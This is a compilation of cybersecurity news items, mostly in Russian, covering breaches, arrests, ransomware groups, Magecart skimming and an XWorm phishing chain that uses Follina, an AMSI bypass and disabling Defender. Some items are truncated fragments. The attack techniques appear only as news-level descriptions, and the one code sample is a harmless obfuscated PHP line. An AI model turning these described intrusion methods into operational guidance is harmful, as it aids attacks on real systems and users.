Поскольку Microsoft постоянно блокирует известные методы атак, хакеры отчаянно ищут обходные пути. И эксплуатация протоколов поиска — как раз один из таких путей для обхода системных ограничений.
Эксперты рекомендуют избегать кликов по подозрительным ссылкам и загрузки файлов из неизвестных источников, чтобы не пополнить список жертв изобретательных киберпреступников.
Полиция провинции Сингбури (Таиланд) сообщила об аресте 44-летней Кетканьи Кхантави (Ketkanya Khanthawee) по обвинению в мошенничестве с кредитными картами. Таким образом, полностью раскрыто дело об ограблении посла Новой Зеландии в Таиланде, которое тянулось с 2008 года. Как уточняют журналисты Bangkok Post, Кхантави была последним остававшимся на свободе членом группировки кардеров, состоявшей из семи человек.
14 лет назад им удалось купить у гражданина Малайзии данные кредитной карты новозеландского дипломата. Они смогли перенести их на пластик, причем не ограничились только одним экземпляром. В итоге десятки копий карточки использовались в самых разных уголках страны для покупки и дальнейшей перепродажи дизельного топлива и бензина. Суммарный ущерб составил около 10 миллионов бат (7,5 миллионов рублей по курсу 2008 года или 23,7 миллиона рублей по курсу 2023 года).
По словам генерал-майора местной полиции, Кеткания призналась, что принимала участие в афере с карточками новозеландского посла, покупая топливо и другие товары на заправках в разных провинциях. Женщина также рассказала, что после выдачи ордера на ее арест в 2008 году ей пришлось скитаться по стране, не оставаясь подолгу на одном месте. При этом возможности покинуть Таиланд, числясь в официальном розыске, у нее не было.
• Source: [https://www.bangkokpost.com/thailan...rested-for-b10m-ambassadors- credit-card-fraud](https://www.bangkokpost.com/thailand/general/2552640/woman- arrested-for-b10m-ambassadors-credit-card-fraud)
Страховщикам Англии запрещено возмещать убытки от кибератак правительственных хакеров.
Рынок страхования Lloyd’s of London запретит стразовым компаниям возмещать убытки жертвам кибератак правительственных хакеров, связанных с кибервойной или катастрофическим ущербом, поскольку расширяющаяся отрасль продолжает адаптироваться к меняющемуся ландшафту киберугроз.
В бюллетене, выпущенном 16 августа , излагаются требования, которым страховые группы должны следовать начиная с конца марта 2023 года. Согласно документу, страховщики не обязаны покрывать убытки от кибератак, которые происходят в рамках кибервойны, а также от атак правительственных хакеров, которые «значительно ухудшают способность государства функционировать» или влияют на безопасность государства. Законопроект также требует, чтобы члены синдиката Ллойда имели четкую систему того, как приписать атаку государственному субъекту.
Способность киберпреступников легко распространять атаку и вредоносный код, а также зависимость общества от IT-инфраструктуры означает, что потери от атак могут значительно превысить страховые суммы.
Соучредитель и генеральный директор страховой компании Coalition Джошуа Мотта сказал, что большинство страховых полисов уже исключают военные действия из страховки, «хотя право сделать исключение всегда лежит на страховщиках». По словам Мотта, требования Lloyd имеет место быть, но пока не ясно, достигнет ли законопроект своей цели на практике.
source: assets.lloyds.com/media/35926dc8-c885-497b-aed8-6d2f87c1415d/Y5381%20Market%20Bulletin%20-%20Cyber- attack%20exclusions.pdf
32-летний житель Ноттингема получил срок за кибершпионаж. Как утверждает следствие, обвиняемый взламывал компьютеры и смартфоны более десятка жертв (некоторые были несовершеннолетними) и шпионил за ними с помощью трояна, обеспечивающего удалённый доступ (RAT).
Помимо этого, осуждённый Роберт Дейвис использовал фейковые профили в социальных сетях и поддельные Skype-аккаунты для заманивая жертв в ловушку. В личных сообщениях он отправлял пользователям ссылки, по которым на устройство устанавливалась вредоносная программа.
Поскольку авторы трояна использовали обфускацию, зловред часто не детектировался антивирусными продуктами. Управляя вредоносом, Дейвис искал и воровал фото- и видеоматериалы интимного характера. Само собой, основными жертвами стали девушки.
«Как минимум в одном из эпизодов обвиняемый использовал несанкционированный доступ для шпионажа за девочкой-подростком через веб-камеру её устройства. В результате в руки злоумышленника попали медиаматериалы сексуального характера», — сообщили правоохранители Великобритании.
Интересно, что Дейвис также являлся пользователем торговой онлайн-площадки We Leak Info, на которой в своё время размещались около 12,5 млрд данных, украденных в ходе различных кибератак. Преступнику удалось собрать целую коллекцию инструментов для кибершпионажа.
За это суд Великобритании приговорил Дейвиса к 26 месяцам заключения.
• Source: <https://www.nationalcrimeagency.gov.uk/news/cyber-voyeur-hacked- computers-to-spy-on-victims>
Networking device maker Ubiquiti has confirmed that it was the target of an extortion attempt following a January security breach, as revealed by a whistleblower earlier this week.
The company, however, didn't confirm the whistleblower's claims that user data
was accessed during the incident or that the attackers stole any Ubiquiti
source code.
Ubiquiti added that incident response experts hired to investigate the breach
didn't find evidence of customer information being targeted during the breach.
"These experts identified no evidence that customer information was accessed,
or even targeted," Ubiquiti said in a
[statement](https://community.ui.com/questions/Update-to-January-2021-Account-
Notification/3813e6f4-b023-4d62-9e10-1035dc51ad2e).
"The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information.
"This, along with other evidence, is why we believe that customer data was not
the target of, or otherwise accessed in connection with, the incident."
Ubiquiti is cooperating with law enforcement in an ongoing investigation of
the incident, which has revealed that the attacker "is an individual with
intricate knowledge" of Ubiquiti's cloud infrastructure.
Although no proof that customer info was accessed, the networking device vendor advises customers to reset passwords and enable two-factor authentication on their accounts.
"All this said, as a precaution, we still encourage you to change your password if you have not already done so, including on any website where you use the same user ID or password," the company said.
Caption
Ubiquiti told customers after the January security incident that the attacker compromised systems hosted at a third-party cloud provider with no indication that users' accounts were affected in any way.
However, earlier this week, a whistleblower involved in the breach response
challenged the company's story, saying that the incident's actual impact was
massive.
Ubiquiti allegedly discovered the incident in December 2020 after the hacker
already gained admin level to the company AWS accounts and databases stored on
AWS.
After removing a backdoor used by the attacker in January, the hacker tried to extort the networking device vendor asking for 50 bitcoins not to reveal the breach, saying that he already stole Ubiquiti source code.
As the whistleblower also revealed, Ubiquiti did not have a logging system setup which meant that they could not check what data or systems the attacker accessed.
The company refused to pay the ransom and, instead, found and removed a second backdoor from its systems, changed all employee credentials, and issued the January 11 security breach notification.
As it stands, from all the info surrounding the breach exposed by the whistleblower, Ubiquiti has only confirmed the hacker's extortion attempt.
Claims that source code was stolen and customers' information was accessed during the breach are yet to be confirmed.
Еще в апреле 2020 года Комиссия по ценным бумагам и биржам США (SEC) обвинила основателей криптовалютного стартапа Dropil в мошенническом ICO на $1.8 млн. Теперь они признали свою вину в преступлении.
Жители Калифорнии Джереми МакАлпин (Jeremy McAlpine) и Захари Матар (Zachary Matar) должны подписать признательные показания в ближайшие дни. По данным прокуроров, МакАлпин и Матар провели продажу токенов DROP тысячам инвесторов, а вырученные средства предполагалось использовать для торговли на криптовалютном рынке с помощью ботов.
«Чтобы продать токены и привлечь инвесторов, МакАльпин и Матар опубликовали серию ложных заявлений на своем сайте и через аккаунт в Twitter. Они фальсифицировали результаты торговли на децентрализованных биржах, чтобы создать впечатление, что их стратегия работает и приносит прибыль. Также были фальсифицированы объемы продаж токенов DROP – основатели стартапа заявляли о получении $54 млн от 34 000 инвесторов, хотя всего было получено $1.9 млн от 2 500 человек», – подчеркивается в заявлении Министерства юстиции США.
Незарегистрированное ICO проходило с января по март 2018 года. Согласно данным прокуроров, обвиняемые получили $1 896 657 от 2 472 инвесторов, при этом было продано примерно 629 млн токенов DROP. МакАльпин и Матар использовали как минимум $1.6 млн полученных средств для выплат себе и партнерам.
В конце января 2021 года стало известно, компания SonicWall пострадала в ходе «скоординированной хакерской атаки», использовавшей некую уязвимость в собственных продуктах компании. Вскоре после этого эксперты сообщили, что загадочная уязвимость нулевого дня в сетевых устройствах SonicWall уже находится под «беспорядочным» атаками. При этом аналитики были убеждены, что обнаружили ту самую 0-day уязвимость, при помощи которой взломали саму SonicWall.
На этой неделе компания наконец представила обновление прошивки (10.2.0.5-29sv) для устройств серии SMA 100, которые находились под атаками. Разработчики подчеркивают, что все пользователи аппаратных решений SMA 200, SMA 210, SMA 400, SMA 410 и виртуальных SMA 500v (Azure, AWS, ESXi, HyperV) должны установить это обновление незамедлительно.
Согласно бюллетеню безопасности, патч устраняет проблемы, позволяющие злоумышленникам получить учетные данные администратора и удаленно выполнить произвольный код на устройствах.
Хотя представители SonicWall по-прежнему не раскрывают почти никаких деталей уязвимости, свет на происходящее пролили эксперты компании NCC Group, ранее обнаружившие атаки на эту уязвимость. Так, в Twitter Олли Уайтхаус и Рич Уоррен (Ollie Whitehouse и Rich Warren) дают советы по обнаружению «обхода аутентификации» на устройстве.
«Трудно объяснить, что именно нужно искать, не слишком все упрощая, как мы видели на примерах F5 и Citrix. В настоящее стоит рассматривать неожиданный доступ к интерфейсу управления как верный показатель компрометации», — писал Уайтхаус.
Click to expand...
__https://twitter.com/x/status/1355872426245156866
Рич Уоррен, в свою очередь, пошел даже дальше и перечислил определенные пути, которые могут указывать на успешный обход авторизации в логах SonicWall. По его словам, о компрометации могут свидетельствовать запросы /cgi- bin/management, если их не предваряли успешные запросы к /api/v1/logon ил /api/v1/logon//authenticate.
Чтобы проверить обход на уровне пользователя через VPN-клиент или интернет, следует искать в логах доступа записи о /cgi-bin/sslvpnclient и /cgi- bin/portal. Если пользователь получил доступ к этим путям без предварительного доступа путям, перечисленным далее, это указывает на обход авторизации. Через VPN-клиент: /cgi-bin/userLogin. Через веб: /api/v1/logon (200) и /api/v1/logon//authenticate.
То есть приведенные исследователями данные указывают на то, что уязвимость позволяет удаленным атакующим получить доступ к внутренней сети или интерфейсу управления без предварительной аутентификации.
Источник: xakep.ru/2021/02/04/sonicwall-patch/
A web hosting company named No Support Linux Hosting announced today it was shutting down after a hacker breached its internal systems and compromised its entire operation.
Специалисты Positive Technologies проанализировав угрозы последнего квартала 2020 года, выявили по всему миру рост числа атак, направленных на торговые компании и медучреждения. Еще одной тенденцией стало увеличение числа атак на частных лиц с использованием методов социальной инженерии.
Количество инцидентов в 2019 и 2020 годах (по месяцам)
В течение всего 2020 года эксперты наблюдали ежеквартальное увеличение числа киберинцидентов, и четвертый квартал не стал исключением. Количество атак по сравнению с третьим кварталом выросло на 3,1%, а в сравнении с аналогичным периодом 2019 года рост составил 42,2%. Ранее отмеченный тренд на переход от социальной инженерии к взломам организаций укрепился. В инцидентах с частными лицами, напротив, эксперты зафиксировали всплеск применения техник социальной инженерии, доля этого метода выросла с 67% в третьем квартале до 86%.
Методы атак (доля атак)
Исследование показывает, что количество атак на отрасль торговли увеличилось на 56% в сравнении с третьим кварталом и достигло абсолютного максимума за последние два года. Около трети атак в этой сфере были проведены операторами программ-вымогателей, а в каждой пятой атаке на торговые предприятия использовались веб-скиммеры, которые злоумышленники размещали на взломанных сайтах магазинов.
«Чаще всего в ходе атак на торговлю злоумышленники похищают данные платежных карт, к примеру, в четвертом квартале их доля среди всей украденной информации составила 33%, — комментирует аналитик Positive Technologies Яна Юракова. — На втором месте по популярности персональные данные клиентов (27%) и на третьем — учетные данные (20%)».
Click to expand...
Типы украденных данных (в атаках на организации)
Под шквал атак также попали фармацевтические компании, участвующие в цепочке производства и поставки вакцины от COVID-19, например Fareva, Dr. Reddy's и Johnson & Johnson. Злоумышленники не только пытаются украсть их наработки и сорвать производство, но и продолжают эксплуатировать интерес обычных людей к теме вакцины. По данным исследования, в четвертом квартале около 40% всех фишинговых рассылок на тему пандемии были посвящены именно вакцине.
В последнем квартале 2020 года аналитики Positive Technologies вновь отметили рост числа атак с использованием шифровальщиков, их доля составила 56% среди всех атак с использованием малвари. Больше всего атак замечено в отношении медицинских (20%) и государственных учреждений (19%), а также промышленных компаний (11%). Среди наиболее активных шифровальщиков исследователи выделают Ryuk, REvil, Clop, Egregor и DoppelPaymer.
Источник: xakep.ru/2021/03/29/iv-2020/
Киберполицейские разоблачили 25-летнего жителя Днепропетровщины, который взломал около 10 тыс. электронных почтовых ящиков граждан для похищения и продажи персональных и финансовых данных потерпевших. Фигуранту избрана мера пресечения в виде содержания под стражей, ему грозит до 15 лет заключения.
Киберполицейские Днепропетровщины совместно со следователями Следственного управления ГУНП в области под процессуальным руководством Днепропетровской областной прокуратуры разоблачили и пресекли противоправную деятельность 25-летнего хакера-самоучку из города Каменское.
С начала 2024 года мужчина с помощью внедрения вредоносного программного кода (так называемые SQL-инъекции) взламывал серверы различных вебресурсов, в частности сайтов знакомств, и получал списки электронных почт пользователей, к которым в дальнейшем осуществлял подбор пароля с применением специального программного обеспечения. Сленговое название такого метода излома - брутфорс (от англ. brute force - грубая сила).
Таким образом фигурант получил авторизационные данные от электронных почтовых ящиков более 10 тыс. пользователей из разных стран.
Специализированное программное обеспечение для вмешательства в работу электронных сетей и автоматического подбора паролей хакер приобрел в интернете.
В дальнейшем злоумышленник осуществлял вход в скомпрометированные аккаунты пользователей, которые не были защищены двухфакторной аутентификацией. Таким образом хакер получал информацию, необходимую для доступа к криптокошелькам жертв и присваивал их виртуальные активы. Из «отработанных» аккаунтов злоумышленник формировал базы данных для продажи в даркнете.
Киберполицейские установили около 10 учетных записей фигуранта на различных хакерских форумах, часть из которых администрируется из РФ.
Ранее в этом году правоохранители при силовой поддержке спецподразделения ТОР провели обыски по адресу проживания фигуранта и в автомобиле, которым он пользовался. Изъяты компьютерная техника и мобильные телефоны.
Следователи сообщили мужчине о подозрении по ч. 5 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей), ч. 1 ст. 361-2 (Несанкционированные сбыт или распространение информации с ограниченным доступом, которая хранится в компьютерах) Уголовного кодекса Украины Ему грозит до 15 лет лишения свободы с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет.
Судом подозреваемому избрана мера пресечения в виде содержания под стражей с правом внесения залога.
Проверяется возможность сотрудничества фигуранта с агентами врага. Продолжаются следственные действия для установления полного круга потерпевших и размера нанесенного ущерба. Возможна дополнительная квалификация.
• Source: https://cyberpolice[.]gov.ua/news/prodavav-bazy-danyx-tysyach- korystuvachiv-policzejski-dnipropetrovshhyny-zatrymaly-xakera-242/
Совет Федерации, ФСБ, МВД и компании, занимающиеся информационной безопасностью (ИБ), обсуждают возможность создания реестра белых хакеров и их сертификацию. Об этом «Ведомостям» рассказали три источника, близких к различным ИБ-компаниям. По их сведениям, вопрос обсуждался на закрытой встрече представителей ведомств в начале августа.
Член комитета Совета Федерации по конституционному законодательству и государственному строительству Артем Шейкин подтвердил, что данный вопрос прорабатывается в рамках законопроекта о белых хакерах. В сентябре ожидается подписание решения секции совета по развитию цифровой экономики при Совете Федерации по этой теме.
Источник «Ведомостей» в одной из крупных ИБ-компаний отмечает, что предложенные меры по созданию реестра и сертификации должны обезопасить работу bug bounty со значимыми объектами, включая критическую информационную инфраструктуру (КИИ). По его мнению, это позволит легализовать многие направления, связанные с наступательной и превентивной безопасностью, а также устранить серые зоны, в которых сейчас находятся белые хакеры.
Эксперты также отмечают, что государство пока не обладает достаточным инструментарием для контроля за соблюдением правил сертификации. По их мнению, здесь вступают в силу инструменты рынка. Специалисты предполагают, что сообщество будет против предлагаемого регулирования, но те, кто захочет работать легально, будут проходить сертификацию. Наличие сертификата может стать основанием для принятия экспертизы таких хакеров компаниями и частными лицам.
Другие эксперты считают идею непродуманной. По их мнению, это приведет к тому, что никто не захочет серьезно заниматься анализом защищенности КИИ и других систем, если для этого потребуется находиться в реестре. Они также выражают обеспокоенность тем, что в России реестры часто становятся объектом утечек, что может представлять серьезную опасность для людей, находящихся в них. Существуют опасения, что против таких специалистов могут быть введены персональные санкции США и других стран, а их жизни могут подвергаться опасности.
Подробнее: https://www.securitylab.ru/news/551278.php
The spyware is called EyeSpy which is a legit software used to monitor employees' activities. This Iranian-based software is being used by "malicious" actors to infect user's and spy on their activities.
This seems to be happening since May 2022 and specially in September after anti-government protest began (more info about this: [https://www.euronews.com/2022/12/20...neration-z-will-the-unrest-lead-to- revolution](https://www.euronews.com/2022/12/20/iran-protests-what-caused- them-who-is-generation-z-will-the-unrest-lead-to-revolution))
Since other providers were blocked in the country, these smaller, third-party VPNs saw a huge widespread use.
Sources:
<https://www.techradar.com/news/spyware-found-stealing-iranian-user-data-via-
infected-vpn-installer>
https://thehackernews.com/2023/01/beware-tainted-vpns-being-used-to.html
Уникальный случай расследовали Sophos X-Ops, выпустив соответствующий отчет ([https://news.sophos.com/en-us/2022/...omotive-supplier-in-triple-ransomware- attack/](https://news.sophos.com/en-us/2022/08/10/lockbit-hive-and-blackcat- attack-automotive-supplier-in-triple-ransomware-attack/)).
Случилось все в мае месяце, когда файлы жертвы ransomware были зашифрованы тремя различными бандами вымогателей, причем две атаки произошли всего за два часа.
Атаки последовали за первоначальным взломом систем компании вероятным брокером начального доступа IAB в декабре 2021 года, который использовал неправильную конфигурацию брандмауэра для взлома сервера контроллера домена с использованием подключения по протоколу удаленного рабочего стола RDP.
После первоначальной компрометации операторы LockBit, Hive и ALPHV/BlackCat также получили доступ к сети жертвы 20 апреля, 1 мая и 15 мая соответственно.
1 мая полезные нагрузки LockBit и Hive были распространены по сети с помощью легитимных инструментов PsExec и PDQ Deploy в течение двух часов для шифрования более десятка систем во время каждой атаки. При этом оператор LockBit еще успел эксфильтровать данные в облачное хранилище Mega.
Как отметили исследователи (
__https://twitter.com/x/status/1557334700926050305
), поскольку атака Hive началась через 2 часа после старта шифрования Lockbit, обе группы натыкались на уже зашифрованные файлы.
Две недели спустя, 15 мая, пока ИТ-команда автомобильного поставщика все еще работала над восстановлением систем, оператор BlackCat также подключился к серверу управления, скомпрометированному ранее LockBit и Hive.
После установки удаленного доступа через Atera Agent, хакеры получили постоянство в сети и извлекли украденные данные.
Далее в течение получаса BlackCat доставила в сеть свою полезную нагрузку, используя PsExec для шифрования шести машин после бокового перемещения по сети с использованием скомпрометированных учетных данных.
Удалив теневые копии и очистив журналы событий Windows на скомпрометированных системах, последний злоумышленник также усложнил попытки восстановления и усилия группы Sophos по реагированию на инциденты.
BlackCat потер доказательства, которые Sophos могла использовать для отслеживания активности трех групп вымогателей, находясь в сети жертвы.
По итогу, специалисты Sophos в середине мая обнаружили файлы, трижды зашифрованные с помощью программ-вымогателей Lockbit, Hive и BlackCat, а также три разных заметки о выкупе в зашифрованных системах.
Sophos также представили рекомендации по защите от аналогичных атак со стороны нескольких групп вымогателей.
Ресерчеры также предлагает блокировать такие службы, как VNC и RDP, или решения для удаленного доступа, доступные извне. Они должны быть доступны через VPN и только через учетные записи с принудительной многофакторной аутентификацией (MFA) и надежными паролями, если требуется удаленный доступ.
Сети также должны быть сегментированы путем разделения важных серверов на VLAN, а вся сеть должна быть просканирована и проверена на наличие неисправленных и уязвимых устройств.
P.S и что это? :\
Фото: ЦОС ФСБ РФ / РИА Новости
Со дня громких арестов членов киберпреступной группировки REvil, считавшейся одним из главных хакерских объединений мира, прошел почти месяц. За это время специалисты по информационной безопасности уже успели предположить, что задержанными на самом деле могли оказаться совсем не те, за кем охотились спецслужбы. А это значит, что лидеры объединения до сих пор могут оставаться на свободе. «Лента.ру» разобралась, могли ли в ФСБ принять за высококвалифицированных специалистов из даркнета их помощников, которые занимались легализацией доходов.
Российский даркнет звонко
отреагировал на аресты хакеров из
группировки REvil: многие пользователи даркнета оказались напуганы возможными
совместными операциями американских и российских силовиков против
киберпреступников. Западные эксперты даже поспешили сообщить, что
киберпреступники пребывают в ужасе. Завсегдатаи теневых форумов перестали
верить в надежность России как убежища от американских силовиков и даже
всерьез задумались о переносе не то большей части операций, не то самих себя в
более безопасные, по их мнению, регионы: Индию, Китай, Израиль и государства
Ближнего Востока.
После ареста членов REvil дотошные аналитики отмотали один из форумов на
несколько недель назад и наткнулись на сообщение одного из пользователей:
«Все, кто меняет (обналичивает полученные преступным путем прибыли от
киберпреступлений, — прим. «Ленты.ру») в
Москве или Питере, — прекращайте.
ФБР уже в Москве, через менял
кроют работяг-рансомварщиков (вычисляют членов хакерских группировок,
распространяющих вымогательское ПО, — прим. «Ленты.ру»)».
В итоге многие обитатели даркнета впали в паранойю и начали подозревать в
связях со спецслужбами администраторов крупных теневых площадок. Однако
наименее подверженные панике посетители даркнета обратили внимание на одну
странность: у арестованных 14 января хакеров было при себе слишком много
наличных.
В даркнете заметили, что у членов REvil нашли слишком много денег
Фото: ЦОС ФСБ РФ / ТАСС
Масла в огонь подлили журналисты авторитетного западного издания SecurityWeek,
[опубликовавшие](https://www.securityweek.com/revil-ransomware-operations-
apparently-unaffected-recent-arrests) со ссылкой на аналитиков ReversingLabs
материал о том, что REvil, судя по активности в сети, не прекращала
деятельность даже после громких арестов. А значит, руководители группировки
остались на свободе.
«На самом деле количество обнаруженных файлов и программных модулей, связанных
с программой-вымогателем REvil, даже незначительно увеличилось в течение
последовавшей за арестами в России неделей», —
[сказано](https://blog.reversinglabs.com/blog/after-russian-arrests-revil-
rolls-on) в исследовании ReversingLabs.
Аналитики, впрочем, не сказали прямо, что руководство группировки могло остаться на свободе, но отметили, что организация может восстановиться после арестов. «Это связано с тем, что такие группы, как REvil, существуют по принципу корпораций. Большая часть работы по проведению атак и получению платежей возлагается на аффилированных лиц. Аресты этих аффилированных лиц часто никак не влияют на существование самой линейки вредоносного ПО, а также не мешают дальнейшей их модификации», — считают в ReversingLabs.
Дмитрий Коротаев — один из тех обвиняемых, которые отказались признавать свою
вину
Фото: Пресс-служба Тверского суда / ТАСС
Видные западные эксперты по информационной безопасности в итоге раскритиковали и SecurityWeek, и ReversingLabs. Они напомнили, что в действительности группировка REvil фактически прекратила свою деятельность еще несколько месяцев назад. В России исследование преимущественно проигнорировали, хотя, например, аналитики компании Т.Hunter, занимающиеся информационной безопасностью, предположили, что REvil еще даст о себе знать: «Похоже, дело в том, что ФБР вычислило не самих хакеров, а обнальщиков. Их ФСБ и задержало, а вот про оставшихся на свободе взломщиков рискуем еще услышать».
ФБР могло дать коллегам в Москве неправильную наводку
Фото: Yuri Gripas / Reuters
Версию про оставшихся на свободе хакеров озвучил и руководитель лаборатории компьютерной криминалистики компании Group-IB Олег Скулкин. Его смутили не столько деньги на кадрах оперативной съемки, сколько предъявленные арестованным обвинения — в соответствии с частью 2 статьи 187 УК РФ — «Неправомерный оборот средств платежей».
«Судя по предъявленным обвинениям, задержаны были не разработчики программы- вымогателя REvil и даже не партнеры, которые ее арендовали, а лица, участвовавшие в обналичивании денежных средств. Несмотря на некоторую обеспокоенность коллег REvil, представители других партнерских программ активно продолжают атаки», — заявил Скулкин.
У арестованных в январе членов группировки REvil изъяли 426 миллионов рублей, 500 тысяч евро, 600 тысяч долларов США. Не все наличными, но стопки пятитысячных купюр на оперативном видео произвели впечатление на теневых форумах. Мнение многих из числа обитателей даркнета ФСБ не понравилось бы: мол, киберпреступники не держат такое количество денег, а потому задержанные действительно могли быть лишь теми, кто обналичивал доходы от совершенных преступлений, а не руководством группировки.
Конкретные схемы отмывания денег лежат где-то между финансовой сферой и технологиями. При реализации одной из них, например, нанимали водителей из Uber, чтобы фальсифицировать поездки и проводить таким образом несуществующие мошеннические платежи.
Не исключено, что с этим хакерам помогает традиционная преступность. Как отмечает руководитель центра мониторинга и реагирования на инциденты ИБ Jet CSIRT компании «Инфосистемы Джет» Алексей Мальнев, именно те сложности, которые киберпреступники испытывают с выводом и легализацией доходов, могут решить «авторитеты» из реального мира.
Для традиционной преступности киберпространство — очевидно, новое поле для
деятельности, куда постепенно перейдут все криминальные финансы и где легче
оставаться анонимным. И объединение сил даст новые возможности для реализации
сложных и рискованных схем социальной инженерии
Алексей Мальневруководитель центра мониторинга и реагирования на инциденты ИБ
Jet CSIRT компании «Инфосистемы Джет»
Еще в ноябре 2021 года журналисты
Bloomberg
[заявили](https://www.bloomberg.com/news/articles/2021-11-03/bitcoin-money-
laundering-happening-in-moscow-s-vostok-tower-experts-say?sref=Y0jVLcFo), что
башня «Федерация Восток» в «Москве-Сити» стала настоящим центром обналичивания
криптовалют. По сведениям издания, которые были получены от американского
Минфина, в башне
расквартированы около 50 компаний, которые могут иметь отношение к
сомнительным махинациям. Против одной из них — Suex OTC — США даже ввели
санкции. Правда, официальной реакции от Москвы на сведения Bloomberg не
последовало.
Часть денег, принадлежащих арестованным 14 января хакерам, обнаружили на
криптовалютных биржах
Фото: ЦОС ФСБ РФ / ТАСС
Детали того, как движется следствие в отношении задержанных членов REvil, до сих пор не обнародованы, а вопрос о том, кого на самом деле задержали оперативники — простых обнальщиков или киберпреступную элиту, — остается открытым. Возможно, он отпадет сам собой, если к началу судебных слушаний в списке обвинений появятся другие, более «профильные» для киберпреступников статьи.
source: lenta.ru/articles/2022/02/05/revil
Кибервымогательская группировка Ragnarok (Asnarök) объявила о завершении своей деятельности и выпустила бесплатную утилиту для восстановления зашифрованных файлов.
Бесплатный декриптор со вшитым мастер-ключом для дешифровки был опубликован в четверг, 26 августа, на принадлежащем группировке web-портале в даркнете, где она ранее публиковала данные жертв, отказавшихся платить выкуп.
Ряд исследователей безопасности изучили декриптор и подтвердили его подлинность. В настоящее время они проводят подробный анализ инструмента с целью переписать его в безопасный и простой в использовании вариант, который затем будет опубликован на портале NoMoreRansom Европола.
Кибервымогательская группировка Ragnarok начала свою активность в конце 2019-го – начале 2020 года. С помощью эксплоитов хакеры взламывали сетевые устройства и устройства для охраны периметра и через них прокладывали себе путь к ключевым серверам и рабочим станциям.
Для повышения своих шансов на получение выкупа от жертвы злоумышленники также похищали файлы из атакованной сети и угрожали их публикацией на своем портале в даркнете, если деньги не будут переведены вовремя.
Как правило, группировка атаковала шлюзы Citrix ADC. Кроме того, именно она стояла за нашумевшей волной атак на межсетевые экраны Sophos XG через уязвимость нулевого дня. Хотя эксплоит был рабочим и позволял Ragnarok устанавливать бэкдор в межсетевых экранах Sophos XG по всему миру, компания Sophos своевременно обнаружила атаки и заблокировала хакерам возможность развертывания вымогательского ПО.
За месяц до ухода с киберпреступной арены группировка поменяла дизайн своего сайта, удалила данные большинства своих старых жертв, а затем даже переименовалась в Daytona by Ragnarok.
Ragnarok является уже третьей кибервымогательской группировкой, выпустившей декриптор для восстановления файлов этим летом. Так, в июне ключ для расшифровки опубликовала группировка Avaddon , а ранее в текущем месяце – SynAck.
Сотрудники отдела киберпреступности Управления по борьбе с терроризмом и транснациональной преступностью (CTTC) столичной полиции Дакки (Бангладеш) арестовали трех участников хакерской группировки по обвинению во взломе компьютерных систем одной из крупнейших в стране торговых сетей Shwapno.
В период с 26 июня по 9 июля 2021 года киберпреступники изготовили поддельные цифровые ваучеры на сумму в 1,8 млн такк (примерно $21 тыс.). Затем злоумышленники продавали ваучеры некоторым пользователям через группу в социальной сети Facebook со скидкой в 25%. Полученные денежные средства переводились на различные счета в криптовалюте.
Как сообщили в полиции, данные преступники ранее взломали компьютерные системы различных организаций, включая web-сайты международной организации фрилансеров в Австралии и несколько бангладешских электронных адресов коммерческих сайтов.
Преступники также похитили деньги у многих известных коммерческих предприятий, в том числе авиакомпаний, известных автобусных компаний, электронных бюллетеней и сетевых торговых точек. У хакеров был доступ к системам многих государственных и негосударственных организаций.
Группировки Magecart, специализирующиеся на краже платёжной информации клиентов онлайн-магазинов, продолжают совершенствовать методы извлечения данных и ухода от детектирования. Теперь злоумышленники прячут украденные данные банковских карт в изображениях.
Киберпреступники, которых ИБ-сообщество окрестило общим термином Magecart, действуют с помощью веб-скиммеров. С 2010 года эксперты наблюдали за десятком подобных групп.
Как ранее отмечали специалисты компаний RiskIQ и FlashPoint, некоторые группировки действуют более профессионально. Например, получившая имя Group 4 команда использует весьма продвинутые методы кражи и хранения данных.
Среди жертв подобных киберпреступников была и британская авиакомпания British Airways, и другие крупные и узнаваемые бренды: Newegg, Ticketmaster, MyPillow, Amerisleep и Feedify.
Исследователи в области кибербезопасности то тут, то там обнаруживали десятки скимминговых скриптов, которые группы Magecart использовали для кражи данных банковских карт. Команда Sucuri отдельно отметила интересную тактику: злоумышленники «засовывают» информацию о картах пользователей в файлы изображений, хранящиеся на их серверах.
Этот трюк помогает скрыть факт кражи от экспертов и в целом избежать лишнего детектирования. Впоследствии преступники могут загрузить все спрятанные данные с помощью простых GET-запросов. Специалисты Sucuri в ходе анализа обнаружили несколько таких изображений.
Сначала эксперты обратили внимание на зашифрованную base64 информацию, а затем, уже расшифровав её, увидели, что это номера CVV, даты окончания срока действия и другие данные банковских карт. Исследователи также указали на использование обфускации.
Пример:
Code:Copy to clipboard
<?php echo ""."h"."e"."".""."llo"."w"."o"."".""."r"."l"."d"."";
• Source: <https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox- concatenation.html>
Специалисты компании Securonix [заметили](https://www.securonix.com/blog/securonix-threat-labs-security- meme4chan-advisory/) фишинговую кампанию, которой дали название MEME#4CHAN. По словам экспертов, злоумышленники используют уникальную цепочку атак для доставки малвари XWorm на машины жертв и применяют «необычный код PowerShell, наполненный мемами».
Атаки MEME#4CHAN в первую очередь нацелены на производственные фирмы и медицинские клиники, расположенные в Германии, сообщают специалисты.
Новое исследование основано на [недавних выводах](https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and- agenttesla) аналитиков Elastic Security Labs, которые первыми выявили приманки злоумышленников, с помощью которых жертв заставляют открывать вредоносные документы, распространяющие полезные нагрузки вредоносов XWorm и Agent Tesla.
Такие атаки начинаются с фишинговых писем, к которым прикреплены фейковые документы Microsoft Word. Вместо вредоносных макросов здесь используется нашумевшая в прошлом году уязвимость Follina (CVE-2022-30190) для доставки жертве обфусцированного скрипта PowerShell.

Злоумышленники применяют этот скрипт PowerShell для обхода Antimalware Scan
Interface ([AMSI](https://learn.microsoft.com/en-
us/windows/win32/amsi/antimalware-scan-interface-portal)), отключения
Microsoft Defender и закрепления в системе, в конечном итоге, запуская на
машине жертвы бинарник .NET, содержащий XWorm.
Исследователи отмечают, переменные в упомянутом PowerShell-скрипте имеют
необычные названия, в основном отсылающие к различным мемам и культурным
феноменам: CHOTAbheem (популярный в Индии мультсериал Chhota
Bheem), Sexybunbun, MEME2026,
Shakalakaboomboom и так далее. Именно поэтому вредоносная кампания носит
название MEME#4CHAN.

